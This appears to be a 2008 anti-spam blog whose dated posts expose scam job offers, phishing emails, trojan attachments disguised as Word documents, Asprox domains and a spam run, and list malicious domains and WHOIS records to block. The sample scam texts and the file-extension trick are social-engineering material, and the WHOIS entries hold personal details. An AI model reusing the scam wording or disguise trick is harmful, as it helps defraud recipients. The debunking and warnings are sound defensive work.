Sponsored by..

Wednesday, 5 November 2008

"App LLC Group." scam

Another ridiculously worded scam job offer, essentially identical to this one.

Subject: How for short time to earn $1200 in a week? Read!
"Sucky sucky long time five dollar" to you too.

HELLO EVERYONE!
Woot!


Please take your time and read about this genuine offer, job position.Make money
spending only few hours a day, if you are located in Australia! This position either
can replace your current job, or can be as an extra income for you. Denmark
successful company - Apple Sales Group brought this opportunity for you.
Advertisement itself is brought to you via Google ads (Paid advertisement, assigning
e-mail business account). The most convenient and smart position for anybody who has
couple hours a day, Monday-Friday. You will be able to make 1400+ AUD a week! It's
either - you do want to participate in this, or - you do not, that's what makes it a
genuine offer and worth reading and finding out more. If you meet requirements - do
not hesitate to receive full information:
1400 AUD? You said $1200 a moment ago. Are we talking US$ or AU$? At least I know it's "Genuine" because you said so twice. Shame about the really bad English, all the Danish people I know speak English very well.

*You are 18+ y/o
*You are Reliable and Enthusiastic person.
*You Have 2-3 Hours a Day of Your Spare/Free Time, Monday-Friday(Saturday).
*You Are Located in United Kingdom/Ireland.
*You Have Access to Internet 2-3 Hours A Day, Monday-Friday(Saturday).
Didn't you just say Australia? These are different countries, you know.

Reference:
"The Most Creative Opportunity of The Month" - "Two Time" Magazine, quote by Angela
Roer.
"Consider This Opportunity" - "Behind The Truth" Magazine, quote by Marcus Stowee.
"I can't believe I was so stupid" - "State Penitentiary newsletter", quote by hapless money mule victim.

To receive full information reply only to e-mail: apple.swed404@gmail.com
with subject "More Information" and one of our representatives will assist you
shortly.
Thank you for your interest and Good Luck!


Best Regards,
App LLC Group.
Apple.Swed404? Sweden? I thought you said you were based in Denmark? App LLC? That wasn't the company name you gave earlier.

Originating IP is 95.57.7.182 in Kazakhstan. That country has featured in these fake job offers before (here and here).

Tuesday, 4 November 2008

"Recovery KEYS for your account" trojan

Another day, another ZIP-in-EXE trojan with a lot of spaces in it.


Subject: Recovery KEYS for your account

Good afternoon, [victim]

There are the keys to recover your personal account. In order to use them later,
please, preserve them in a sure place.

Sincerely, Dick Riddle

Attachment: the_Keys.zip

The ZIP files contains an EXE that looks like a Word document, The_Keys.doc[88 spaces].exe. Worryingly, VirusTotal detects nothing at all. The trojan is cleary related to this one and this one.

Monday, 3 November 2008

"Colorado Business Bank - Network Security and Monitoring"


These banks get more obscure all the time, but still carry the same sort of malicious payload.



Subject: Colorado Business Bank - Network Security and Monitoring
From: "Colorado Business Bank Account Service" alert@cobizbank.com

COLORADO BUSINESS BANK NOTICE:

Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.
VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.

Proceed to customer service department>>

Sincerely, Everett Torres.
Copyright - Colorado Business Bank, a part of COBIZ BANK.



VirusTotal detections are the usual mixed bag. Most detections seem to be generic (e.g. W32/Packed_FSG.D, TR/Crypt.FSPM.Gen, Trojan.Win32.Packed.gen, TrojanDownloader:Win32/Suceret.gen!A)

Friday, 31 October 2008

Dating scams and 79.135.168.*

We've seen this type of dating scam several times before. No good will come of engaging "Chantel" in conversations as she doesn't really exist. It will be some fat sweaty Russian bloke probably.

Subject: hi from chantel

hello, I am pretty russian girl, bored tonight.
would you like to chat with me and see my pics?
if so then email me at echantel39@officialsup.com
This is hosted on 79.135.168.36 which has been fingered before for fraud. Allegedly, the netblock is registered to an outfit in the Lebanon:


inetnum: 79.135.168.0 - 79.135.168.255
netname: LB-NET
descr: Lebanon private dedicated service
country: LB
admin-c: MHB1111-RIPE
tech-c: MHB1111-RIPE
remarks: abuse mailbox: moh.b@lubnannetworks.biz
status: ASSIGNED PA "status:" definitions
mnt-by: SISTEM-NET-MNT
source: RIPE # Filtered

person: Mohamed Baga
address: Basha Garden bldg, 5th floor LB
address: Jisr El Bacha Main Road
address: Beirut - Lebanon
e-mail: moh.b@lubnannetworks.biz
remarks: abuse mailbox: moh.b@lubnannetworks.biz
phone: +961 1 512341
nic-hdl: MHB1111-RIPE
source: RIPE # Filtered

% Information related to '79.135.160.0/19AS44097'

route: 79.135.160.0/19
descr: Sistemnet Telecom
origin: AS44097
mnt-by: Sistem-Net-MNT
But just a few IP addresses away is another netblock that we have seen before in Turkey. The whole netblock is a complete sewer and is listed on the Spamhaus DROP List. There are 2000+ domains in this /24 block, but just for brevity I will list the ones on this server - avoid them all.

  • Abgol.com
  • Amnocx.com
  • Bestsup.com
  • Cahla.com
  • Cardrealc.com
  • Centralrd.com
  • Direktmal.com
  • Equipyard.com
  • Escitatop.com
  • Eupoc.com
  • Ezshl.com
  • Firstlam.com
  • Flasheon.com
  • Flhnation.com
  • Flhplanet.com
  • Flhsupplies.com
  • Freeldp.info
  • Gbizc.info
  • Gbladx.info
  • Gblhome.info
  • Gblwizard.info
  • Golbalhobby.com
  • Goldenttamil.com
  • Goldirecto.com
  • Goldpug.info
  • Golguia.com
  • Golmundo.com
  • Golottoclub.com
  • Golsitio.com
  • Goltierra.com
  • Gosfordw.com
  • Hlgag.com
  • Hollandlopflags.com
  • Hyperlam.com
  • Jenniferlop.com
  • Jflyik.com
  • Ldphome.info
  • Ldpwizard.info
  • Lgbidxx.info
  • Lopguide.com
  • Meinmal.com
  • Miniplushlop.com
  • Modhl.com
  • Morerd.com
  • Moresup.com
  • Nitgbx.info
  • Officialflh.com
  • Officialgbl.info
  • Officialldp.info
  • Officialshl.com
  • Officialsup.com
  • Oldpee.info
  • Onlineflh.com
  • Onlineshl.com
  • Onlinesup.com
  • Pacanimal.com
  • Planetflh.com
  • Planetsup.com
  • Rdplanet.com
  • Revaloplast.com
  • Shemalglobal.com
  • Shlcentral.com
  • Shlnation.com
  • Shlsupplies.com
  • Shlwizard.com
  • Solidgoldent.com
  • Soundevelop.com
  • Superldp.info
  • Superlop.com
  • Supplanet.com
  • Supwizard.com
  • Tapthelop.com
  • Theloppet.com
  • Upflyp.com
  • Uplea.com
  • Virtualldp.info
  • Virtualsup.com
  • Virtuellmal.com
  • Wildevelop.com
  • Wildpin.info
  • Worldpivot.info
  • Worldplayservices.info
  • Yourldp.info
  • Yourlopmen.com
  • Yourloprabbit.com
Namesevers are NS1.DROREAL.COM and NS2.DROREAL.COM, both on 79.135.168.36.

Thursday, 30 October 2008

"Apollo Business Services" / scam job offer


Spammers are stupid. This job offer scam combines two different offers, both of which are fraudulent. Part one is for "Apollo Business Services". Check out the very strange disclaimer on the bottom.




Subject: job offer for you. thanks
From: "Worldmarkettusew" worldmarkettusew@gmail.com

Apollo Business Services part-time opportunity (40/hr)
Dear ,

Apollo Business Services company was established in 2004 by an international team
of financial and marketing experts. We specialize in delivering positive business
results through solving currency exchange problem as well as online payments and
transactions, their tools being innovative solutions, high performance and e-commerce
optimization techniques.

We offer a "work at home" part-time position "Regional Manager". This includes
processing payments between our partners' clients and our company, ensure all personal
data relating to customers is maintained, accurate and kept discreet, identifying
opportunities to improve service delivery.

Position Type: Permanent.
Working hours: 9:00AM - 1:00PM weekdays. Variable overtime is also required.
Occupation Type: part-time (1-5 hours a day occupation).
Salary: $40 per hour.

Professional qualities and skills:

* Scrupulous and diligent;
* Computer literate;
* Good organizational and administrative skills;
* Payment procedures prior experience would be an asset;
* Ability to work independently.

Please REPLY to this e-mail to receive further information and application forms.

Yours sincerely,

Robert Hughley,
HR Manager,
Apollo Business Services
You are receiving this employment opportunity email because you uploaded your resume on CareerBuilder. This email is used for hiring process only to prevent the company from spam messages.
If your employment status has changed or you no longer wish to receive these emails, you can update your privacy and communication preferences from your resume by logging onto CareerBuilder.com:
http://www.careerbuilder.com/jobseeker/emails/emailsubcenter.aspx

Or you can Block this employer from viewing your resume and sending you candidate emails.

This email was sent from Account ID ATXNC91MZIFSAQTSAC7 and by this logged in User U48VA7D999LFKCKNSYZ
DISCLAIMER
The content of this email has been reviewed and approved by CareerBuilder. This email is intended for the use of the individual address named above and may contain information that is confidential, privileged or unsuitable for overly sensitive persons with low self-esteem, no sense of humour or irrational religious beliefs. If you are not the intended recipient, any dissemination, distribution or copying of this email is not authorised and constitutes an irritating social faux pas.



Bizarrely, attached to this spam are five other attachments trying to punt a different scam:




Dear sir or madam,
My name is Jackie Simons, I am an Advertising Manager at SocMart (www.socmart.com.ua).
The company’s principal activity is investment in residential property of developing
countries.
Our chief objective is to attract foreign investors to the affobadle housing market
of Belorussia,
Russia, Ukraine, Kazakhstan and etc. The housing prices are often high in these
countries and tend to
continuously increase, whereas the quality of the property remains rather low. As
far as we are eager to change the
situation, our company is now focused on attaraction of potential foreign investors
to the available property market
of the former CIS countries. Our three-year experience in the property investment
market has revealed an excessive number
of people willing to invest their funds into developing countries’ residential
property. However, we came across a problem
concerned with bureaucracy, as banking systems of the former CIS countries are
still undeveloped for prompt and effective
international bank transfer service. Lack of proper relations between Western and
Eastern banking systems dealing with
international bank transfer service does not allow us to process promptly our
foreign customers’ investments
(investments are to be on hold during 1-2 months). The fact that property prices are
continuously flactuating has made
it clear that efficiency in investment processing is our priority. Considering the
above we had to recourse to “investment managers”
to accelerate investment processing to the maximum extend. In case you got
interested with our proposal do not hesitate to contact us by e-mail:
worldmarkettusel@gmail.com



SocMart is a wholly legitimate Ukranian firm dealing in real estate who are NOT responsible for this spam. Whichever version of this you get, avoid it like the plague.

Added: the following email addresses are being use for this, and probably others:
worldmarkettusef@gmail.com
worldmarkettuse@gmail.com
worldmarkettusel@gmail.com
worldmarkettusew@gmail.com
worldmarkettusey@gmail.com

"Auction Sales Online" job scam

It isn't always clear what the scam is with these fake job offers, but it seems that fraudsters need to recruit a large number of patsies to run their operation. In fact, there is quite a large bogus career network going on here, with "employees" trades between various underground enterprises.



Subject: Working Part Time

Auction Sales Online is currently hiring for work at home positions,
in the United Kingdom, part-time and full-time available. The positions
focus on providing administrative assistance in online sales.

Auction Sales Online provides business support, retail distribution,
franchise operations, direct sales, and a variety of auction as well
as accounting and billing services.

Salary:

Part-time: 1,100GBP/month plus commission
Full-time: 2,200GBP/month plus commission

Professional Qualities:

- Customer focused decision maker
- Demonstrates a high level of personal accountability
- Thinks about the team first over personal agendas
- Excellent communication skills

Basic Requirements:

- Internet Access
- Microsoft Office
- Basic Accounting skills

If you are interested in this position please send us an email to
Tracy.Miller@aso-careers.com expressing your interest and we will
forward you the detailed job description and the agreement.

Best regards,
ASO Team





This particular job scam references the domain aso-careers.com which has been registered for this purpose. The WHOIS records are almost definitely fake, registered through BIZCN.COM, INC.:

Domain name: aso-careers.com

Registrant Contact:
Sam Lloyd
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

Administrative Contact:
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

Technical Contact:
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

Billing Contact:
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

DNS:
ns1.floodinger.com
ns2.floodinger.com

Created: 2008-10-27
Expires: 2009-10-27
floodinger.com is a new one, but the registration details are hidden. ns1.floodinger.com is 67.202.88.243 in the US and 21.214.23.151 which apparently belongs to the Department of Defense (!).

Mail is handled by 12.192.82.225 which we have seen twice before. The Silent Noise blog fingers that as part of the Asprox network. Asprox involvement is hardly news - it's an impressively large underground organisation (presumably with it's own underground lair).. although it is quite possible that Asprox facilities are being used on behalf of a client.

Anyway, avoid unsolicited job offers, and always ask for some real, verifiable contact details. In the UK you can check details at Companies House. For US companies, the state Division of Corporations should have company details, or you can perhaps check at the BBB.

Estdomains is not dead yet



Thanks to Sandi for bringing the not-so-good-news that Estdomains is not quite dead yet. For a moment it looked like ICANN had grown some cojones, but perhaps not.

Estdomains termination was based on the fact the their President, Vladimir Tsastsin, has been convicted of fraud in Estonia. However, Estdomains are attempting to wriggle out of this by saying that Tsastsin didn't do it and he resigned as president some time ago. Bearing in mind that an Estonia court said he DID do it (although he is appealing, but that could take for ever) and that the only proof offered by Estdomains that he resigned looks a bit unconvincing, then the whole excuse looks rather thin.

Of course, the reason why Estdomains should be terminated is their long-running association with organised crime, as documented here and here. Add to that the fact that the company deliberately conceals its identity by using a Delaware corporation as a front (when obviously "Est" is for Estonia), and it is clear that they should have been terminated a long, long time ago.

Wednesday, 29 October 2008

Persimmon Homes / Marks & Spencers Vouchers Hoax

There is currently a hoax email circulating similar to the following:

Thought this might be useful with Christmas coming up

Marks & Spencer, in conjunction with Persimmon Homes, are giving away free vouchers. Marks & Spencer's are trying word-of-mouth advertising to introduce its products and the reward you receive for advertising for them is free non-refundable vouchers to be used in any M & S store.

To receive your free vouchers by e-mail all you have to do is send this e-mail out to 8 people (for £100 of free vouchers) or 20 people (for £500 of free vouchers). Within 2 weeks you will receive an e-mail with your vouchers attached. They will contact you through your e-mail address.

NB. Please mark a copy to:
Andy.curran@persimmonshomes.com
As it happens, the domain name persimmonshomes.com is incorrect, it would be persimmonhomes.com. But no matter, Persimmon categorically deny that is is anything to do with them:

"Hoax E-mail"

A hoax e-mail is being circulated offering a promotion of free Marks and Spencer vouchers for forwarding the e-mail to colleagues and friends.

Neither Marks and Spencer or Persimmon Homes have made any such promotional offer.

Please delete the hoax e-mail and notify the people to whom you have sent it that it is a hoax.
It turns out that this hoax has been doing the rounds since 2007. There's also an interesting thread about it here.

You can also check out Dynamoo's Email Etiquette page for some advice on what is appropriate to forward and what isn't.

Estdomains is dead


Good riddance to bad rubbish - Estdomains has be de-accredited by ICANN, although it took long enough. If you're a registrar who wants to take on some of the most toxic domain names in the business, then ICANN invites you to apply for them.

More details here. Thanks to Spyware Sucks for the heads-up.

Alex Shafts, CEO / World Wide Domain Names Part II

Yesterday's "Alex Shafts" spam run is the most bizarre I have seen in a long time, and clearly has been quite widespread given the hundreds of visitors who have come to this blog.
  1. Spammer appears to have lost his home, so presumably is in financial trouble. That sucks, times are certainly hard for a lot of people.. often through no fault of their own.
  2. Spammer discovers affiliate marketing. Done right, this can make you a lot of money.. assuming that you do it right.
  3. Spammer decides that LunarPages web hosting affiliate program looks good.
  4. Spammer rents a server, a mailing list and writes some ad copy. I can quite believe that the spammer bought the mailing list in good faith - often scraped email addresses are mis-sold as opt-in addresses.
  5. Now things start to go awry - the spammer's email is not CAN-SPAM compliant. The subject line is deceptive (it is "Notice Regarding Your DOMAIN NAME", the spam is about hosting). There is no physical address on the email, and no opt-out mechanism.
  6. On the plus side, the spammer is not hiding his identity, and the spamvertised domain of worldswidedomainname.com has what appears to be vaguely valid contact details (although the house currently appears to be empty).
  7. Now for the REALLY stupid part - the spammer has set up a mailing list to distribute the spam, but there are no restrictions on who can send to it. So when some addresses start to auto-respond, those responses are then re-spammed out to everyone on the list. I have seen dozens of these, but I think that my spam filter has kept out a LOT more.
  8. Spammer's affiliate account, hosting and even Yahoo! email address gets nuked from orbit. Kudos to LunarPages and IX Web Hosting for their prompt action.
  9. Who knows what will happen next? A LOT of people are really angry about the email storm that this has generated. Some may even take legal action.
There's another interesting blog entry about this at Skillett.com which expands on the story some.

So here's the scorecard for this particular bit of affiliate marketing:

  • Keeping within the Terms of Service for your affiliate program: FAIL
  • Keeping within the Terms of Service for your web host: FAIL
  • Technical expertise: FAIL
  • Legal compliance: FAIL
  • Income generation: FAIL
  • OVERALL: FAIL
Now if only Ecommerce corporation could shut down the spam coming through 98.130.1.155 then everyone else would have a WIN. As of about 0500 GMT the darned stuff is still coming through..

Tuesday, 28 October 2008

Alex Shafts, CEO / World Wide Domain Names / LunarPages spam

There's more to this spam than meets the eye.. and be certain that it IS spam and isn't any kind of communication from your domain name registrar:



Subject: Notice Regarding Your DOMAIN NAME
From: "Domain Name Support"
Date: Tue, October 28, 2008 5:16 am
To: info@worldswidedomainname.com


*****************************************
Important Notice Regarding Your Domain Name(s)
*****************************************

Dear Webmaster,

According to our records you are the ADMINISTRATIVE CONTACT.

We would like to inform you we have partnered up with LunarPages Web Hosting. We understand you are currently hosting with another provider. But we encourage you to try out LunarPages. LunarPages also has an affiliation program where you can embed banners on your website and earn $65 for every referral.

A little more information about LunarPages; Lunarpages Web Hosting was born from Add2Net in 2000, and has grown rapidly providing Shared Hosting, Dedicated, Reseller, and most recently, VPS Hosting Plans. LunarPages is BBB Accredited and is rated A for excellence. LunarPages also has received many Industry Awards including Web Host Magazines highest level of recommendation. LunarPages is one of the fewest hosting services that provide unlimited transfer and unlimited data storage.

LunarPages can fit your business needs whether you’re a small business or a large company. Join (or lurk about) Community Forums and ask our customers why they host with LunarPages. For more in depth information, news and articles about Web Hosting, Marketing, SEO, Traffic, AdWords, Design, Networking and General Fluff, visit Lunartics Blog (updated daily, sometimes hourly). Our BlogStars consist of a team of more than 20+ industry experts. You may learn something, or simply be entertained.

VISIT LUNARPAGES

If you’re not ready to give LunarPages “Web Hosting” a try just yet, TRY the affiliation program where you can earn hundreds or even thousands a month. Save this email for your records and click the link above for special promos throughout the year.

Best Regards,

Alex Shafts, CEO

World Wide Domain Names

If you are the domain administrator of more than one domain account, you may receive this notice multiple times.
-------------------------------------------------------------------

All rights reserved.



Who the heck is Alex Shafts? And who are "World Wide Domain Names"? Certainly nobody I do business with. So let's see who is sending this first of all. A look at the mail headers will be interesting:

X-Spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on blade2.cesmail.net
X-Spam-Level:
X-Spam-Status: hits=0.9 tests=HTML_MESSAGE,URIBL_RHS_DOB version=3.2.4
Received: from unknown (192.168.1.88)
by blade2.cesmail.net with QMQP; 28 Oct 2008 05:27:00 -0000
Received: from mail500.opentransfer.com (98.130.1.155)
by ********** with SMTP; 28 Oct 2008 05:27:04 -0000
Received: (qmail 624 invoked by uid 399); 28 Oct 2008 05:16:47 -0000
Mailing-List: contact info-help@worldswidedomainname.com; run by ezmlm
Precedence: bulk
X-No-Archive: yes
List-Post:
List-Help:
List-Unsubscribe:
List-Subscribe:
Delivered-To: mailing list info@worldswidedomainname.com
Received: (qmail 618 invoked by uid 399); 28 Oct 2008 05:16:47 -0000
X-Originating-IP: 68.230.241.45
Received-SPF: none (mail500.opentransfer.com: domain at worldswidedomainname.com does not designate permitted sender hosts)
identity=mailfrom; client-ip=68.230.241.45;
envelope-from=;
X-Authority-Analysis: v=1.0 c=1 a=J2IRbVyBMHeSdsxzcmgA:9
a=21DexejRGg20G2OFDxsA:7 a=V6NLHKsM1nmveCJf-9nhvT6W67oA:4 a=htsp1cwEuSoA:10
a=6-9Fr_h7AAAA:8 a=Vm2oXCpbAAAA:8 a=n4JkmEeXAAAA:8 a=W_LaJHSTY1FKiyaM68cA:9
a=aa2LJqmKak3HsCtWz3EA:7 a=2hL6MRTsiU3c-Xv2ucuIwzcZna0A:4 a=ojskhZjZVJUA:10
a=pM-imOxlMqoA:10 a=fd-QgsGfzTIA:10 a=AfD3MYMu9mQA:10
X-CM-Score: 0.00
Message-ID: <802858ce0ad3496e988f0c3c39bc0060@alex>
From: "Domain Name Support"
To:
Subject: Notice Regarding Your DOMAIN NAME
Date: Tue, 28 Oct 2008 01:16:39 -0400
The originating IP address is 68.230.241.45 which is Cox Communications.. but we also have a domain name of worldswidedomainname.com. The WHOIS details for that domain match the sender's name:

Registrant:
Alex Shafts
504 LEONARD AV
Las Vegas, NV 89106
US

Domain name: WORLDSWIDEDOMAINNAME.COM

Administrative Contact:
Shafts, Alex worldsdomainnames@yahoo.com
504 LEONARD AV
Las Vegas, NV 89106
US
702.5431469
Technical Contact:
Shafts, Alex worldsdomainnames@yahoo.com
504 LEONARD AV
Las Vegas, NV 89106
US
702.5431469

Registrar of Record: TUCOWS, INC.
Record last updated on 24-Oct-2008.
Record expires on 25-Oct-2009.
Record created on 25-Oct-2008.
This domain is just a couple of days old which sets the alarm bells ringing. A Google search for "504 Leonard Av" comes up with a couple of YouTube videos [1, 2]. It turns out to be a foreclosure sale, OK that really sucks for Mr Shafts but it is no excuse to sent out spam.

So, what is this spam trying to get you to do? Is it important? Nope. It's actually just spam for the LunarPages affiliate program. Web hosting affiliate programs can be big earners - in this case LunarPages pay $65 per sign-up. Not bad, but all this email is trying to do is get you to sign up for web hosting. It is in no way an official notice from your registrar.

We know that desperate situations lead to desperate actions, but sending out spam and what is basically deceptive advertising is not going to help.

Added: just to prove himself a bigger idiot, the mailing list that he created to send out the spam ALSO accepts email from absolutely anyone so now there's a real shitstorm of comments, autoreplies and bouncebacks. What a plonker.

Added: check out the comments to this post, also this blog entry has more details. I have made a follow-up entry here explaining the problem in more detail.

Friday, 24 October 2008

"Ferrasano Ferrosan" scam email

Another scam job offer, this time it looks like money laundering. The email is perhaps unintentionally funny, and has a few new social engineering twists.

Subject: Internet Brings a Job Position that Changes Peoples Lives!
Err yeah, money laundering can lead to a prison sentence for the hapless money mule.
Greetings to Everyone in UK! You Have a Lifetime Opportunity to Start making up to 700 GBP per Week, Getting Paid Daily!
Wow.. *everyone* in the UK? That's some spam run.

Successful company from Norway - Ferrasano Ferrosan Group, Offers an Outstanding Job Position!
Googling for "Ferrasano Ferrosan" brought up exactly zero hits.. except for this post in a few minutes (probably).
This Is a Real Genuine Offer That You've Never Seen before, that Gives You Financial Freedom.
Of course, it isn't a "real genuine offer" at all. It's a scam.

Please Take Couple Minutes to Discover This Amazing Opportunity That Will Change Your Life.
But not change it is a GOOD way.

You Are Being Offered an Outstanding Job Position Called "Fund Operator"!
i.e. a money mule.
Here are Few Requirements Before You Apply:

1. This Offer is for United Kingdom/Great Britain Only.
2. You Have to Have 2-3 hours of spare Time Monday-Friday.
3. You Have to be Enthusiastic About It and Be Able to Provide Us With Best Service.
4. No Past Experience Required/ No School Degree Required!
5. Be Able to Check E-mail 4-5 Times a Day and Stay in Touch With us Throughout the Day if Possible!
6. You need to be gullible.
Company Itself is Based in Norway, although Ferrosan is a worldwide health center that Distributes Businesses All Over the World and We Represent
our Norway Location, Fairly Young, but Successful Organization. With the Help of
Google Advertisements it Was Possible to Deliver This Message to You! Nowadays Internet Makes it Possible for Us to Interact on a Whole New Level.
Ferrosan is a genuine company, but it is based in Denmark. It was founded in 1919. "Google Advertisements"? This must be the upcoming "Google Spam (beta)" then.

Full Information About Position Will be Given in Full Package that You Can Request by E-mail, See Below How to Request Full Package.
I'll give that a miss, thanks.

Some References about Position:

Jeff Sparks states in "In Touch Weekly" magazine: "..Great Britain discovers great
opportunity from FF Group.."

Linda Abramke states in "Forbes" magazine: "..Internet simplifies communication and provides more opportunities..", talking about our job position.

Melissa Richardson states in "Cosmopolitan" magazine: "..New opportunity for single moms or students..", talking about simplicity and reliability of position.
These are all completely fake, of course, it's just another piece of social engineering. Sometimes 419 fraudsters uses references on CNN or the BBC to try to add credibility.

You Will be able to Start Working with Us within 24 hours After You Apply and be
able to Start Making Money Immediately! Anybody can Do It, so Don't Hesitate
and Feel Free to Request Full Information, as It will Change Your Life, you will not
Have to Worry About Finances Anymore!
That "change your life" thing again...

Asprox: 47mode.name, berjke.ru, 81dns.ru

There has been a shift overnight in the domains used in the Asprox SQL injection attack, the ones to look for are:

  • 47mode.name
  • berjke.ru
  • 81dns.ru
Registration for the .ru domains looks like this:

domain: 81DNS.RU
type: CORPORATE
nserver: ns1.81dns.ru. 76.240.151.177
nserver: ns2.81dns.ru. 76.182.187.206
nserver: ns3.81dns.ru. 69.62.229.141
state: REGISTERED, DELEGATED
person: Private Person
phone: +3 212 7721130
fax-no: +3 212 7721130
e-mail: igorlsoloti@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.10.23
paid-till: 2009.10.23
source: TC-RIPN
47mode.name is different:

Registration Service Provided By: RESELL.BIZ
Contact: +1.3124476810
Website: http://Resell.biz

Domain Name: 47MODE.NAME

Registrant:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Creation Date: 21-Oct-2008
Expiration Date: 21-Oct-2009

Domain servers in listed order:
ns3.47mode.name
ns2.47mode.name
ns1.47mode.name

Administrative Contact:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Technical Contact:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Billing Contact:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Status:ACTIVE
It looks like "Kimberly Maupin" might well be a real person living in Sneads Ferry, who's identity has been "borrowed". However, the ZIP code is incorrect and the telephone number appears to be in Bolivia.

Anyway, block these domains or check your logs for them.

Thursday, 23 October 2008

MS08-067

Microsoft Security Bulletin MS08-067 – Critical: Vulnerability in Server Service Could Allow Remote Code Execution (958644)

Let's make it simple: PATCH NOW. Microsoft's say that this can spread from machine to machine without authentication, and reliable exploit code is likely. This makes it the ideal security flaw to hook a worm onto, like Blaster or Sasser.

If you're a corporate user with a firewall DO NOT imagine that the firewall will offer you much in the way of protection. Eventually either a worm-infected laptop will be plugged into your internal network, or possibly a infected machine may breach the firewall when it connects through the VPN. If there is a widespread outbreak and you're not prepared, then shutting off your VPN may buy you some time.

"WorldPay CARD transaction Confirmation" / "Academic Resources Center Inc." trojan


This is a fake email message pretending to be from WorldPay relating to a payment to "Academic Resources Center Inc".

There's an attached ZIP file, The ZIP contains an EXE designed to look like a DOC.. but oddly with an icon that looks like Excel. Of course, this is actually a nasty trojan rather than a real document.

This is one good reason why you should not hide extensions for known file types on your PC - the icon on the left looks like it has the DOC extension, but only because the real EXE extension can been hidden and is revealed on the right.

VirusTotal indicates patchy detection rates including TrojanSpy:Win32/Zbot.gen!C, Trojan.Win32.FraudPack.gle, Trojan-Spy:W32/Zbot.VM, W32/Trojan3.DU, TROJ_FAKEALE.AI plus some generic heuristic detecions.

In this case, the ZIP is called WorldPay_CARD_Transaction_Confirmation_OrderNo76644.doc.zip and the EXE is WorldPay_CARD_Transaction_Confirmation_OrderNo76644.doc.exe but this may be randomly generated.




Subject: WorldPay CARD transaction Confirmation
From: "Jana Rivera"

Thank you!Your transaction has been processed by WorldPay, on behalf ofAcademic
Resources Center Inc.
The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Academic Resources Center Inc has received your order,
and will inform you about delivery.
Sincerely,
The AcaDemon TeamEnquiries This confirmation only indicates that your transaction
has been processed successfully. It does not indicate that your order has been
accepted. It is the responsibility of Academic Resources Center Inc to confirm that
your order has been accepted, and to deliver any goods or services you have ordered.

If you have any questions about your order, please email Academic Resources Center
Inc at:followup@acade66Smicresourcescenter.com, with the transaction details listed
above.Thank you for shopping with Academic Resources Center Inc.



UPDATE 24/4/09: There's a similar spam run happening again, details are here.

Wednesday, 22 October 2008

"Better Business Bureaus Account Support" trojan


We have seen quite a lot of variants of this particular trojan recently, mostly aimed at banks. This one passes itself off as a some sort of digital certificate, but according to VirusTotal it is a trojan variously identified as TrojanDownloader:Win32/Suceret.gen!A, Win32.Stration, Trojan-Downloader.Win32.WebDown.10 and a number of other generic detections.




Subject: Better Business Bureaus, Attention: Don't leave mail in your mailbox.
From: "Better Business Bureaus Account Support"

Attention Better Business Bureaus Consumers!

We've enhanced web surfing process with new security measures to keep your online
data and personal information safer.
All registered and new BBB consumers must register new software and update contact
information until October 24, 2008.
Please read the following information carefully:

Register your BBB company certificate here>>>

As always, we appreciate your business. And thank you for working with us.

Sincerely, Ila Newell.
2008 Council of Better Business Bureaus


Tuesday, 21 October 2008

6700.cn browser hijack (bad), SUPERAntiSpyware (good)

I've just spent several days investigating a machine with a particularly nasty rootkit infection. Despite throwing several tools at it and rummaging around the hard disk, the rootkit remained. The most obvious sign was a browser hijack pointing at 6700.cn but there were dozens of malware components installed too.

The F-Secure online scanner and ComboFix removed quite a lot of the malware, but hats off to SUPERAntiSpyware which identified and removed the last, tricky part of the rootkit. I haven't come across this application before, but it is definitely worth a look and it has a free trial.

In retrospect, a lot of the rootkit is also plainly visible using Sysinternal Autoruns - the malware components tend to lack "Publisher" details and can be easily identified. You may well need to take the hard disk out and mount it in a USB drive on a second PC, but a word of caution - it is possible to infect the second PC too, so try to avoid using anything mission critical for the cleanup.

"Data request" trojan

Another EXE-in-ZIP-disguised-as-a-DOC trojan, similar to this one.

Subject: Data request
From: "Billy Roark"


Please find the document attached to this message. The report was issued today.
Requested account details have been altered successfully.

Thank you for contacting us.

Respectfully,
Billy
The attachment in this case is called Statement_January-October.zip and contains an executable named Statement_January-October.doc[44 spaces].exe. The blank spaces are designed to push the .exe part of the filename down so that it is invisible.

It is a different binary from yesterday with better detection rates. But the best cure for this is avoidance, and blocking EXEs-in-ZIPs is the best cure.

Monday, 20 October 2008

"Report Jan-Oct." trojan


This fake email contains an EXE in a ZIP designed to look like a Word document (complete with authentic looking icon), in this case "Statement1-10.doc .exe" (there are 75 spaces in the filename that blogger strips out)

Subject: [name] Report Jan-Oct.
From: "Clara Slaughter"

Dear Customer,

As you requested, we are sending you this report with details on your account
transactions made between 1/1/2008 and 10/1/2008.

At your service,
Clara
The attached ZIP file is called Statement1-10.zip. VirusTotal shows detection is poor with what look like generic detections only.

If you mail filter allows it, you should block EXEs in ZIP files. Postini allows this, I guess other filtering services do too.

Thursday, 16 October 2008

"LV Electronics Inc." job offer scam

There are plenty of legitimate companies called "LV Electronics", but this job offer is not from one of them. In this case, the originating IP was 91.77.116.141 in Russia.




Subject: Job offer in the United States.

Greetings.

LV Electronics Inc. is searching for hardworking person, that will represent our
branch in local area.

The required country: UNITED STATES ONLY! (all states).

Prior experience is not necessary; entry level admin, customer service and good
people skills are all you need.
Perfect for anyone who wants to work from home and spend more time with their
